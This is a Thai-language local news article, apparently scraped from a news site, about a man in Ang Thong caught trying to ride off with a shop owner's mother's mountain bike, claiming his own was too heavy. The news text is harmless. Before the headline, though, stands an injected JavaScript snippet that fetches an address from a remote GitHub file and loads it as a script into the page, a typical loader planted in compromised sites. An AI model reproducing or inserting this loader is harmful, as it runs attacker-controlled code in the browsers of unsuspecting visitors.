;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); อ่างทอง หนุ่มวัย40แอบย่องลักจักรยานเสือภูเขาอ้างของตัวเองมันหนักไปขอยืมคันนี้แทนละกัน ด้านสาวเจ้าของเห็นพอดีออกไปดักจับไว้ได้ทัน - ThaiReference | อาสาไทยยืนยัน
อ่างทอง หนุ่มวัย40แอบย่องลักจักรยานเสือภูเขาอ้างของตัวเองมันหนักไปขอยืมคันนี้แทนละกัน  ด้านสาวเจ้าของเห็นพอดีออกไปดักจับไว้ได้ทัน

ผู้สื่อข่าวลงพื้นที่หลังเกิดเหตุลักทรัพย์สุดงง  เมื่อคนร้ายพยายามขโมยจักรยานเสือภูเขา  โชคดีเจ้าของเห็นเหตุการณ์ทันพอดี  เลยต้องจบภารกิจแบบไม่สวย  เหตุการณ์ดังกล่าวเกิดขึ้นเวลาประมาณ 08.20 น. ของวันที่ 15 พ.ย. 68 ที่ผ่านมา  บริเวณร้านกาแฟ–เบเกอรี่  พีโอนี เบค  ซึ่งกล้องวงจรปิดของทางร้าน  จับภาพชายสวมเสื้อสีฟ้า  กางเกงขาสั้น  ใส่หมวกปิดหน้า เข็นจักรยานสีเหลืองของตัวเองเข้ามาในร้านอย่างเนียน ๆ  ทางเจ้าของร้านจึงออกไปขวาง  จับตัวเอาไว้ได้จนมุมตีเนียนว่ารถจักรยานของตนเองมันหนัก  จึงอยากได้จักรยานเบา ๆ  ไปขี่

จากการสอบถาม นาง สุชญา  มิระสิงห์ อายุ 39 ปี เจ้าของร้านและผู้เห็นเหตุการณ์  เล่าว่า  ชายผู้ก่อเหตุ อายุราว 40 ปี ผิวดำแดง  สูงประมาณ 165 ซม.  สวมเสื้อฟ้า  นุ่งกางเกงขาสั้น  ใส่หมวกปิดหน้า  กำลังเข็นจักรยานสีเหลืองของตัวเองเข้ามาในร้านอย่างเนียน ๆ  จนเจ้าของร้านยังนึกว่าเป็นคนงานของพ่อ  ผ่านไปประมาณ 10 นาที  จู่ ๆ  ก็เห็นชายคนเดิมขี่จักรยานออกไป  แต่จักรยานดันกลายเป็น  จักรยานเสือภูเขาของแม่  ราคาเป็นหมื่นบาท  ที่จอดไว้ในโรงรถ

ทางเจ้าของร้านเห็นปุ๊บถึงกับช็อก  รีบวิ่งไปดักหน้าประตูอีกทางทันทีแบบไม่กลัวอะไรทั้งนั้น  น้อง ๆ  ในร้านก็วิ่งตามไปช่วยสกัดจับกันวุ่น  พอถามว่ามาทำอะไร  คนร้ายตอบหน้าตาเฉยว่า  จักรยานของผมมันหนักไป  เลยจะขอเปลี่ยนเป็นคันนี้ครับ  งานนี้ทุกคนถึงกับอึ้งไปสักพักนึง  ไม่รู้จะขำหรือจะงงก่อนดี  สุดท้ายเจ้าของไม่แจ้งความ  เพราะได้จักรยานคืน  ผู้ก่อเหตุเลยต้องเข็นรถคันเดิมของตัวเองกลับไปแบบหนัก ๆ  แต่คงหนักใจแทนจักรยานของตนเองมากกว่า

กนกศักดิ์  แสงตระการ / อ่างทอง